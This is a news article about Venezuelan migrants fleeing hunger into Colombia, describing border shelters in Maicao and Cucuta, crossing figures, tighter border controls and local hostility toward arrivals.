Mechanic Luis Arellano and his children were among the lucky ones who found beds at a shelter in Maicao run by the Catholic diocese with help from the U.N. refugee agency. The 58-year-old said his children’s tears of hunger drove him to flee Venezuela. “It was 8 p.m. and they were asking for lunch and dinner and I had nothing to give them,” he said, spooning rice into his 7-year-old daughter’s mouth. He raised his children’s spindly arms and said: “[These aren’t] the size they should be.”
Read More: Venezuela Must Stop Presidential Elections
The shelter, where bunk beds line the walls of the bedrooms, provides food and shelter for three days and, for those joining family already in Colombia, a bus ticket onwards. It will soon have a capacity for 140 people a night—a fraction of the daily arrivals.
At another shelter in the border city of Cucuta, some 250 miles (400 km) to the south, people regularly spend the night on cardboard outside, hoping places will free up. The largest city along the frontier, Cucuta, has borne the brunt of the arriving migrants.
About 30,000 people cross the pedestrian bridge that connects the city with Venezuela on daily entry passes to shop for food.
The mass migration is stirring alarm in Colombia. A migration official told Reuters as many as 2,000 Venezuelans enter Colombia legally through the border crossing at Paraguachón each day, up from around 1,200 late last year. But officials estimate as many as 4,000 people cross illegally every day.
Colombia is letting the migrants access public health care and send their children to state schools. Santos is asking for international help to foot the bill, which the government has said runs to tens of millions of dollars.
Under pressure from overcrowded frontier towns such as Maicao, Colombian President Juan Manuel Santos announced a tightening of border controls this month, deploying 3,000 additional security personnel. But the measures are unlikely to stem the flow of illegal migrants pouring across the 1,379-mile (2,219 km) frontier.
While many feel a duty to welcome the migrants, in part because Venezuela accepted Colombian refugees during that country’s long civil war, others fear losing jobs to Venezuelans being paid under the table. After locals held a small anti-Venezuelan protest last month, police evicted 200 migrants who were living on a sports field, deporting many of them.
Migrants are verbally abused by some Colombians who refuse them work when they hear their accents, said Flavio Gouguella, 28, from Carabobo. “Are you a Veneco? Then no work,” he said, using a derogatory term for Venezuelans.
Locals also worry about an increase in crime and support police efforts to clear parks and sidewalks. They already have to cope with smuggled subsidized Venezuelan goods damaging local commerce, and have grown tired of job-seekers and lending their bathrooms to migrants. Spooked by police raids, migrants in Maicao have abandoned the parks and bus stations where they had makeshift camps, opting to sleep outside shuttered shops. Female migrants who spoke to Reuters said they were often solicited for sex.
Despairing of finding work, some entrepreneurial migrants turn the nearly worthless bolivar currency into crafts, weaving handbags from the bills and selling them in Maicao’s park. “This was made from 80,000 bolivars,” said 23-year-old Anthony Morillo, holding up a square purse featuring bills with the face of South America’s 19th-century liberation hero Simon Bolivar. “It’s not worth half a bag of rice.”
Despite four months of violent anti-government protests last year, Chavez’s successor Maduro is expected to win a fresh six-year term at elections on April 22. The opposition, whose most popular leaders have been banned from running, are boycotting the vote. Go here for more photos.